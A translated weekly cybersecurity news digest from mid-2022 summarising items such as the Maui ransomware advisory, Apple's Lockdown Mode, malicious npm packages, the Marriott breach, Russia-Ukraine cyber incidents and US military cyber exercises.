It was reported on July 4, citing The Register website, that the UK has signed up to plans with the US to share biometric data on citizens held by police with US border officials.

According to a member of the European Committee on Civil Liberties, Justice and Home Affairs (LIBE), the committee held an informal meeting with US Department of Homeland Security representatives last week, at which the United States requested the introduction of new visa requirements based on the International Biometric Information Sharing Initiative (IBIS) and supported by the Enhanced Border Security Partnership (EBSP), to improve the U.S. Department of Homeland Security's ability to detect threats through biometric information sharing.

LIBE Committee member Patrick Breyer said that during the meeting, the committee found that the UK and three EU member states had signed an agreement to reintroduce US visa requirements that allow access to police biometric identification databases.

The UK Home Office refused to deny it was signing up to the scheme. A spokesman said: "The UK has a long and close partnership with the US, which includes sharing data for specific purposes. We are regularly discussing with them new proposals or initiatives to improve public safety and enable legal travel.”

Under UK law, if the Biometrics Commissioner agrees, police can keep an individual's DNA profile and fingerprint records for up to three years from the date the sample was collected, and police can apply for a two-year extension even if the individual is arrested but not charged. The same applies to those charged but not convicted.

The US Enhanced Border Security Partnership (EBSP) program will reportedly be voluntary initially, but starting in 2027 it will become mandatory under the US Visa Waiver Program (VWP), a program that allows visa-free entry to the U.S. for up to 90 days.

Federal agency says North Korea is behind manually executed ransomware attacks

It was reported on July 6 that, according to a cybersecurity advisory issued by the FBI together with the Cybersecurity and Infrastructure Security Agency and the Treasury Department, state-sponsored actors from North Korea are behind a little-known ransomware known as "Maui."

"The FBI, along with our federal partners, remains vigilant in the fight against North Korea's malicious cyber threats to our healthcare sector," Bryan Vorndran, assistant director of the FBI's Cyber Division, said in a press release about the advisory Wednesday. "We are committed to sharing information and mitigation strategies with our private sector partners to help them strengthen their defenses and protect their systems."

Officials did not elaborate on why they linked the malware to North Korea, other than to point to the profit motive and urgency associated with attacking organizations in the health care sector.

"The FBI assesses that North Korean state-sponsored cyber actors have deployed Maui ransomware targeting healthcare and public health sector organizations," the advisory reads. "North Korean state-sponsored cyber actors may believe that healthcare organizations are willing to pay ransom because these organizations provide services critical to human life and health. Because of this assumption, the FBI, CISA, and Treasury Department assess North Korean state-sponsored actors may continue to target HPH sector organizations."

The advisory is based on FBI observations and incident response activities dating back to May 2021, as well as a report released Wednesday by threat intelligence firm Stairwell on the Maui operation.

Apple Stepping up its war on spyware, a growing digital scourge

It was reported on July 6 that Apple will launch a feature this fall that will allow users to lock down services that might otherwise be exploited by malicious hackers hoping to infect their phones with spyware. While the company anticipates that only a small percentage of users may ultimately need the optional enhanced security layer, the tool highlights Apple's ongoing battle with the growing global spyware industry.

Apple's "Lockdown Mode" is designed to make it harder for attackers to take over a victim's phone by blocking most forms of message attachments and preventing unknown connections to computers or accessories.

The U.S. Department of Defense's Office of Inspector General seeks to migrate data to Cloud

It was reported on July 7 that the Pentagon's internal watchdog is looking to support cloud capabilities for sensitive workloads as the organization moves its computing infrastructure to managed services. According to contract documents released on July 5, the Department of Defense Office of the Inspector General (OIG) expects cloud services to host Department of Defense Impact Level 5 workloads, the most sensitive level of unclassified information.

Currently, the OIG is conducting a market survey and is seeking responses from vendors with IL5 authorization by July 19. The agency said it will review and respond to questions from vendors by July 12. The migration to the cloud will be phased and will include workloads running in hybrid cloud environments. As part of the request for information, OIG wants to hear from vendors about how to isolate their information from other customers in multi-tenant environments. In addition, OIG wants to know whether vendors hold positions on government-wide procurement tools, including the General Services Administration's various schedule and contracting tools.

The U.S. Army successfully migrated Materiel Command applications to the CARMY Cloud

It was reported on July 7 that the Acquisition, Logistics, and Technology Enterprise Systems and Services (ALTESS) product office, part of the Enterprise Services product portfolio of the U.S. Army's Program Executive Office for Enterprise Information Systems (PEO EIS), in partnership with several other Army organizations, successfully completed the migration of 45 Army Materiel Command (AMC) applications from Defense Information Systems Agency (DISA) milCloud® 2.0 to the Enterprise Cloud Management Agency (ECMA) cARMY Cloud in May 2022.

4. Cyber Attack and Defense Dynamics

Ukrainian police disrupted multi-million dollar phishing ring

On June 30, Ukraine's "cyber police" arrested nine members of a suspected prolific phishing ring that made 100 million hryvnia ($3.4 million) by luring locals with the promise of EU financial support.

Digital experts worked together with officials from the Pechersk Police Department and experts from the National Bank of Ukraine (NBU) to solve the case.

The nine men are accused of setting up and operating more than 400 phishing websites that asked victims to enter their bank account and card details in order to apply for social welfare payments from the EU. Once they receive the data, the gang uses it to hijack users' accounts and transfer their funds.

Russian hacker group invaded Ukrainian energy company

It was reported on July 4 that a Russian-speaking hacker group, XakNet, recently claimed that it had invaded the network of Ukrainian energy company DTEK and published a screenshot of DTEK data on its Telegram channel as evidence.

DTEK, which has thermal power plants across Ukraine, said the goal of the hackers was to disrupt the technical processes of its distribution and generation companies, spread negative information about the company's operations and leave Ukrainian consumers without electricity. DTEK specifically pointed out that when it suffered the cyber attack, the Russian army was shelling one of the company's thermal power plants in Kryvyi Rih, central Ukraine, so the cyber attack may be part of the Russian offensive.

The international hacker organization "Anonymous" retaliated by invading the Russian space agency

It was reported on July 4 that Spid3r, a branch of the international hacker organization "Anonymous", stated that in retaliation for the Russian hacker organization Killnet's cyber attacks on the governments of Lithuania and Norway, the group invaded Russia's main space exploration agency, the Institute of Space Research of the Russian Academy of Sciences (IKI RAN).

Spid3r said it would soon publish the data it stole. If true, it would be another cyber attack targeting the Russian aerospace industry in recent months. Previously, hackers claimed to have invaded the Russian space agency Roscosmos and leaked documents related to the ExoMars joint Mars exploration mission between the European Space Agency (ESA) and Russia.

Irish regulatory report warns of Russian cyber threats to Ireland

It was reported on July 3 that Irish High Court Judge Charles Meenan recently submitted a report on government communications monitoring, which stated that Russia's deployment of troops to Ukraine has greatly increased the national security threats Ireland faces in areas such as cyberspace.

The report is not public, but Meenan said that he carefully examined the communications monitored by the police and the army as of June 27, 2022, and found that some individuals and groups inside and outside Ireland pose extraordinarily serious threats to Ireland's national security, including the cyber threat posed by Russia. Some cybersecurity experts commented that Russia could use its cyber capabilities to launch large-scale cyber attacks on Ireland to paralyze public infrastructure or steal sensitive intellectual property and personal data.

Software supply chain attack affects thousands of applications

It was reported on July 6 that security researchers have discovered a major new software supply chain attack, involving the use of malicious npm packages, that affects thousands of applications and websites.

ReversingLabs discovered more than two dozen npm modules dating back six months. They contain obfuscated JavaScript designed to steal form data from the applications they are deployed to. The attackers appear to be using pharming techniques to trick developers into downloading their malware packages.

APT hacker group continues to attack military targets in Bangladesh

It was reported on July 6 that the advanced persistent threat (APT) group named "Bitter" continued to conduct cyber attacks on military entities in Bangladesh.

The news comes from SecuInfra, a team of cybersecurity experts, who issued an advisory on Tuesday describing recent activity by South Asian APTs.

"Through malicious document files and intermediate malware stages, threat actors conduct espionage by deploying remote access Trojans," the document reads.

SecuInfra's findings build on a Talos report released last May that revealed the group's expansion and intent to target government organizations in Bangladesh, and cover a possible attack in mid-May 2022.

Marriott hit by new data breach and failed extortion attempt

It was reported on July 6 that hotel giant Marriott International confirmed that it was hit by another data breach after an unknown threat actor compromised one of its properties and stole 20GB of files.

The attackers were only able to compromise one of the chain's properties, the BWI Airport Marriott, and had limited access to its network.

"This incident only involved one property. The threat actor did not have access to Marriott's core network. Use of one device at the involved property only lasted approximately six hours," a Marriott spokesperson told BleepingComputer.

"Threat actors used social engineering to trick an employee at a Marriott hotel into giving them access to the employee's computer. The threat actors did not impersonate any Marriott vendors."

Russian information operation focused on dividing the Western alliance that supports Ukraine

It was reported on July 7 that Russian intelligence services have been using state-controlled media and other disinformation channels to spread propaganda aimed at dividing the Western alliance that supports Ukraine, according to a report released by cybersecurity firm Recorded Future.

Recorded Future found that much of the open source propaganda is closely related to what the company describes as an "unsubstantiated analytical note" by Russia's Federal Security Service (FSB) Fifth Directorate. Ukraine's security service reportedly intercepted and released the document in June, the report said. The analytical note recommends targeting the "European Community" with information about how support for Ukraine and the large number of Ukrainian refugees will lead to a "deterioration of living standards" within the EU. Experts say that this influence operation is consistent with recent Russian practices.

Hackers released nearly 20GB of top-secret files from Iranian steel manufacturing companies

It was reported on July 7 that the hacker group Predatory Sparrow, which attacked three Iranian steel manufacturing companies on June 27, released nearly 20GB of so-called top-secret data on July 7, local time, including company documents that reveal the facilities' affiliation with Iran's powerful Islamic Revolutionary Guard Corps. In a series of tweets in English and Farsi, the group calling itself Gonjeshke Darande, or Predatory Sparrow, said the 19.76GB of documents was only "Part One" of what is to be released. The group also posted an image of what appears to be an interior view of the steel facility.

The report said Israeli military journalists were regularly briefed informally by senior Israeli officials who suggested that Israel was directly responsible for the attack, in retaliation for the suspected cyberattack in which rocket sirens were heard in Jerusalem and Eilat last week. Bennett was asked about his approach to cyberattacks as prime minister and gave a lengthy and thoughtful response. According to The Times of Israel, Israeli Defense Minister Benny Gantz has ordered an investigation into recent media leaks that "imply" that Israeli military intelligence was responsible for attacks on steel facilities.

5. Cryptotechnology and equipment development

Microsoft Azure now has confidential virtual machines with temporary storage

It was reported on July 5 that Microsoft has expanded its confidential computing products and now allows Azure cloud computing service customers to create hardware-isolated virtual machines (also known as confidential VMs) using ephemeral OS disks.

With this new public preview feature, Azure customers can create ephemeral OS disks only on local VM storage (either in the VM cache or on the VM temporary disk), ensuring that the data remains 100% confidential as it is never sent to remote Azure Storage.

"Ephemeral OS disks are suitable for stateless workloads where the application can tolerate a single VM failure but is more affected by VM deployment time or re-imaging of a single VM instance," Microsoft explains.

"With ephemeral OS disks, you can reduce read/write latency to OS disks and speed up VM re-imaging."

This enables customers to benefit from Azure's hardware-based Trusted Execution Environment (TEE), which protects their data from access from outside the VM while it is being processed.

Code outside the TEE cannot access or tamper with the data inside it, because TEEs are designed to allow only authorized code to execute.

Microsoft says Marketplace images, custom images, and Azure Compute Gallery (formerly Shared Image Gallery) are supported for ephemeral OS disks.

Other key features include fast reset or reimage of VM and scale set instances to their original startup state, lower latency (similar to temporary disks), and stateless application support. Ephemeral OS disks are free and, like persistent OS disks, they are available in all Azure regions (in public preview for confidential VMs).

However, unlike persistent disks, they do not retain OS disk data when the virtual machine is resized, redeployed, repaired, live migrated, or restarted.

Azure customers who decide to use confidential VMs with ephemeral OS disks should be aware that they also come with a set of unsupported features, including capturing VM images, disk snapshots, Azure Disk Encryption, Azure Backup, Azure Site Recovery, and OS disk swapping.

"As part of our commitment to providing the best value for Azure confidential computing, we are announcing support for creating confidential VMs using ephemeral OS disks," the Azure team announced on Tuesday. "This enables customers using stateless workloads to benefit from a Trusted Execution Environment (TEE). A trusted execution environment protects the data being processed from access outside the trusted execution environment."

6. Network combat training trends

Army live-fire exercises help improve the upcoming tactical network equipment

It was reported on July 1 from Aberdeen Proving Ground, Maryland, that the first phase of the Army's European combat demonstration has yielded critical feedback on the continuing incremental construction of its tactical communications network.

Soldiers from 3rd Squadron, 2nd Cavalry Regiment recently conducted a live-fire event in Germany where they tested upcoming equipment. The Army has adopted a multi-year strategy that includes progressively developing and delivering new capabilities to its integrated tactical network, including a combination of program systems of record and commercial off-the-shelf tools. These "capability sets" now deliver technology to units every two years, with each year building on previous deliveries. Capability Set 21 is primarily designed for infantry brigades; Capability Set 23 focuses on Stryker brigades, and Capability Set 25 focuses on armored brigades.

The U.S. Army held the "Cyber Influence" exercise

It was reported on July 3 that the U.S. Army's 46th Task Force held the "Cyber Influence 2022" exercise in Buffalo, New York, from March 8 to 10, 2022.

The exercise was hosted by 12 units from the Army National Guard and other forces. In addition to the troops, participants also included the National All-Domain Warfare Center (NADWC) and government and industry leaders at the local, state and federal levels, including police, emergency response units, environmental protection agencies and power companies, as well as the Royal Canadian Mounted Police, mainly U.S.-Canada border security personnel. The three-day exercise is designed to help partners in the Homeland Defense (HD) domain, Total Hazard Domain, Defense Support to Civil Authorities (DSCA) domain and Chemical, Biological, Radiological and Nuclear (CBRN) domain to strengthen cooperation and familiarize themselves with the impact of cyber attacks in order to prepare for disaster response and consequence management. An academic lecture was held on the first day of the exercise, a tabletop training exercise and a red team maneuver exercise were held on the second day, and a communications exercise and inspection of regional critical infrastructure such as the New York Power Authority were held on the third day.

David Hayes, assistant chief of staff for communications of the Michigan National Guard's 46th Military Police Command (MPC), said that this exercise tested the United States' resilience, strengthened the combat readiness and cooperation of the partners, and improved the effectiveness of all parties' joint efforts in protecting national security.

Cyber Yankee exercise hones New England Guard skills to counter digital threats

It was reported on July 6 that National Guard troops from across New England worked with other military services and the private sector to practice defending against cyber attacks and dealing with their consequences.

The annual Cyber Yankee exercise, held June 5-18 at Camp Nett, Conn., provided participants with valuable insights and tactical experience that can now be applied in the real world, where digital attacks on critical infrastructure and businesses are increasingly common, according to Guard officials.

Cyberattacks on U.S. critical infrastructure are increasing. A 2021 ransomware attack compromised the information and controls of companies including JBS, the world's largest meat producer, and the Colonial Pipeline, which transports refined products from Texas to New Jersey and provides less than half of the East Coast's fuel. In March, Connecticut's Bradley International Airport was hit by a distributed denial-of-service attack aimed at taking its website offline.

END


Shared from: Information Security and Communications Security Magazine Public Account
